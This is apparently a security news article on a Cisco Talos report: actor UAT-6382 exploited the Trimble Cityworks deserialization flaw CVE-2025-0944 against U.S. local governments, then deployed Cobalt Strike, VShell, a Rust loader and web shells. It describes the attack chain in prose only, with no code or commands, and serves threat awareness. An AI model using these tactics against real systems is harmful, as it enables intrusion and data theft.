Chinese Cyber Threat Actors Leverage Trimble Cityworks Vulnerability to Breach U.S. Government Networks

A threat actor identified as UAT-6382, operating with Chinese-language capabilities, has been connected to the exploitation of a recently addressed remote-code-execution vulnerability in Trimble Cityworks, specifically targeting the delivery of Cobalt Strike and VShell malware.

Research conducted by Cisco Talos indicates that UAT-6382 successfully exploited CVE-2025-0944, engaged in reconnaissance activities, and quickly implemented a range of web shells and custom malware designed for sustained access to the compromised systems. Following their initial access, the group demonstrated a particular interest in systems related to utility management.

These attacks, aimed at the enterprise networks of local government entities in the United States, were first detected in January 2025.

CVE-2025-0944, with a CVSS score of 8.6, refers to a vulnerability involving the deserialization of untrusted data within GIS-oriented asset management software, allowing remote code execution. This flaw was patched and included in the Known Exploited Vulnerabilities (KEV) catalog maintained by the U.S. Cybersecurity and Infrastructure Security Agency (CISA) as of February 2025.

According to indicators of compromise (IoCs) shared by Trimble, the vulnerability was exploited to install a Rust-based loader capable of deploying Cobalt Strike alongside a Go-based remote access tool, VShell, in a bid to achieve long-term control over the affected systems.

Cisco Talos is monitoring the aforementioned Rust-based loader, designated TetraLoader, which is constructed using MaLoader, a malware-building framework available publicly and written in Simplified Chinese.

Successful exploitation of the Cityworks application permits the threat actors to conduct initial reconnaissance to collect server information, followed by the installation of various web shells such as AntSword, Chinato/Chopper, and Behinder—tools commonly employed by Chinese hacking collectives.

UAT-6382 has been observed enumerating multiple directories on infected servers to locate valuable files, subsequently relocating them into directories associated with their deployed web shells to facilitate data exfiltration. Furthermore, the group utilized PowerShell to download and implement several backdoors on the compromised systems.